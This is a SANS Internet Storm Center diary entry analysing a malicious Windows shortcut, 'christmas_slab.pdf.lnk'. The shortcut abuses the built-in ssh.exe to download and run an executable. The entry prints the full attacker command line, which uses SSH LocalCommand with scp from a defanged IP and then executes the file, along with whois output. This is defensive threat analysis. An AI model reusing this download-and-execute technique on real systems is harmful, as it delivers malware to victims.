Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer but the technique used here is interesting.
For a while, Microsoft added SSH support to Windows. I remember the first time I typed “ssh” into a command line and I did not get the wonderful message:
'ssh' is not recognized as an internal or external command
Because ssh is avaiable on many computers today, Attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:
remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk ExifTool Version Number : 12.76 File Name : christmas_slab.pdf.lnk Directory : . File Size : 1992 bytes File Modification Date/Time : 2024:12:20 05:39:50-05:00 File Access Date/Time : 2024:12:20 05:39:50-05:00 File Inode Change Date/Time : 2024:12:20 05:39:50-05:00 File Permissions : -rwx------ File Type : LNK File Type Extension : lnk MIME Type : application/octet-stream Flags : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata File Attributes : Archive Create Date : 2024:10:09 05:37:10-04:00 Access Date : 2024:11:05 07:47:23-05:00 Modify Date : 2024:10:09 05:37:10-04:00 Target File Size : 1243648 Icon Index : (none) Run Window : Normal Hot Key : (none) Target File DOS Name : ssh.exe Drive Type : Fixed Disk Drive Serial Number : 280C-1822 Volume Label : Local Base Path : C:WindowsSystem32OpenSSHssh.exe Relative Path : ......WindowsSystem32OpenSSHssh.exe Working Directory : C:Program Files (x86)MicrosoftEdgeApplication Command Line Arguments : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:userspublic. && c:userspublicchristmas-sale.exe" revenge@17[.]43[.]12[.]31 Machine ID : christmas-destr
This LNK file will spawn a ssh.exe that will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retried the file.
Somethign else suspicious, the IP belows to Apple:
NetRange: 17.0.0.0 - 17.255.255.255 CIDR: 17.0.0.0/8 NetName: APPLE-WWNET NetHandle: NET-17-0-0-0-1 Parent: () NetType: Direct Allocation OriginAS: Organization: Apple Inc. (APPLEC-1-Z) RegDate: 1990-04-16 Updated: 2023-11-15 Comment: Geofeed https://ip-geolocation.apple.com Ref: https://rdap.arin.net/registry/ip/17.0.0.0
I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.